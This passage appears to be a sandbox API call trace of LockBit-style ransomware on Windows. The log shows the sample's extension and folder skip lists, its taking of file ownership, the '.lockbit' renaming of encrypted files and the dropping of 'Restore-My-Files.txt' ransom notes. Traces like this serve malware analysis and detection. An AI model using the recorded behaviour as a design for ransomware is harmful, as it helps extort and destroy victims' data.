Maker\\Shared\\DvdStyles\\OldAge\\vintage.png") returned=".png" [0082.525] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.525] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.525] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.525] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.526] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.526] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.526] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.526] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.526] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.526] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.526] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.526] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.526] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.526] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.526] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.526] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.526] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png.lockbit") returned 71 [0082.526] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.527] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.527] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.527] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.527] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.528] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.528] RtlFreeAnsiString (AnsiString="\\") [0082.528] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0082.528] malloc (_Size=0x200) returned 0x77d800 [0082.528] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.528] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.528] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.528] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.529] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.529] CloseHandle (hObject=0x3b4) returned 1 [0082.529] free (_Block=0x77d800) [0082.529] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0082.530] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.530] malloc (_Size=0x40068) returned 0x3db00b8 [0082.531] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=27789) returned 1 [0082.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0082.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0082.532] ReadFile (in: hFile=0x3b4, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0082.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.542] malloc (_Size=0xa4) returned 0x77d800 [0082.542] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0082.542] free (_Block=0x77d800) [0082.542] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.542] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.543] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.543] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="vintage.png", cAlternateFileName="")) returned 0 [0082.543] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0082.543] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Performance", cAlternateFileName="PERFOR~1")) returned 1 [0082.543] lstrcmpiW (lpString1=".", lpString2="Performance") returned -1 [0082.543] lstrcmpiW (lpString1="..", lpString2="Performance") returned -1 [0082.543] lstrcmpiW (lpString1="Performance", lpString2="$windows.~bt") returned 1 [0082.543] lstrcmpiW (lpString1="Performance", lpString2="intel") returned 1 [0082.543] lstrcmpiW (lpString1="Performance", lpString2="msocache") returned 1 [0082.543] lstrcmpiW (lpString1="Performance", lpString2="$recycle.bin") returned 1 [0082.543] lstrcmpiW (lpString1="Performance", lpString2="$windows.~ws") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="tor browser") returned -1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="boot") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="system volume information") returned -1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="perflogs") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="google") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="application data") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="windows") returned -1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="windows.old") returned -1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="appdata") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="Windows nt") returned -1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="Msbuild") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="Microsoft") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="All users") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="mozilla") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="Microsoft.NET") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="microsoft shared") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="Internet Explorer") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="common files") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="opera") returned 1 [0082.544] lstrcmpiW (lpString1="Performance", lpString2="Windows Journal") returned -1 [0082.544] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 56 [0082.545] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*") returned 58 [0082.545] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0082.555] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.555] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.555] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0082.556] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.556] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70562bb6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70562bb6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x0, dwReserved1=0x0, cFileName="720x480blacksquare.png", cAlternateFileName="")) returned 1 [0082.556] lstrcmpiW (lpString1=".", lpString2="720x480blacksquare.png") returned -1 [0082.556] lstrcmpiW (lpString1="..", lpString2="720x480blacksquare.png") returned -1 [0082.556] PathFindExtensionW (pszPath="720x480blacksquare.png") returned=".png" [0082.556] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.556] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.556] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.557] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.557] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.557] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.557] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.557] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.557] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.557] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.558] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.558] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.558] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.558] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.558] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="720x480blacksquare.png") returned 1 [0082.558] lstrcmpiW (lpString1="ntldr", lpString2="720x480blacksquare.png") returned 1 [0082.558] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="720x480blacksquare.png") returned 1 [0082.558] lstrcmpiW (lpString1="bootsect.bak", lpString2="720x480blacksquare.png") returned 1 [0082.558] lstrcmpiW (lpString1="autorun.inf", lpString2="720x480blacksquare.png") returned 1 [0082.558] lstrcmpiW (lpString1="thumbs.db", lpString2="720x480blacksquare.png") returned 1 [0082.558] lstrcmpiW (lpString1="iconcache.db", lpString2="720x480blacksquare.png") returned 1 [0082.559] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.559] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png") returned=".png" [0082.559] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.559] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.559] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.559] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.560] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.560] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.560] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.560] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.560] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.560] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.560] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.560] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.560] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.560] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.560] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png.lockbit") returned 87 [0082.560] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.566] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.567] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.567] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.567] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.567] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.567] RtlFreeAnsiString (AnsiString="\\") [0082.567] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0082.567] malloc (_Size=0x200) returned 0x77d800 [0082.567] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.567] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.567] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.568] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.568] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.568] CloseHandle (hObject=0x3c0) returned 1 [0082.569] free (_Block=0x77d800) [0082.569] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.569] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.569] malloc (_Size=0x40068) returned 0x3d70048 [0082.569] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3823) returned 1 [0082.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.570] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.572] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.572] malloc (_Size=0xc4) returned 0x1ff1e60 [0082.572] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0082.573] free (_Block=0x1ff1e60) [0082.573] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.573] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.573] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.574] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.574] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.574] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.575] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703015e6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x703015e6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1168, dwReserved0=0x0, dwReserved1=0x0, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0082.575] lstrcmpiW (lpString1=".", lpString2="NextMenuButtonIcon.png") returned -1 [0082.575] lstrcmpiW (lpString1="..", lpString2="NextMenuButtonIcon.png") returned -1 [0082.575] PathFindExtensionW (pszPath="NextMenuButtonIcon.png") returned=".png" [0082.575] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.575] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.575] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.575] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.575] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.575] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.576] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 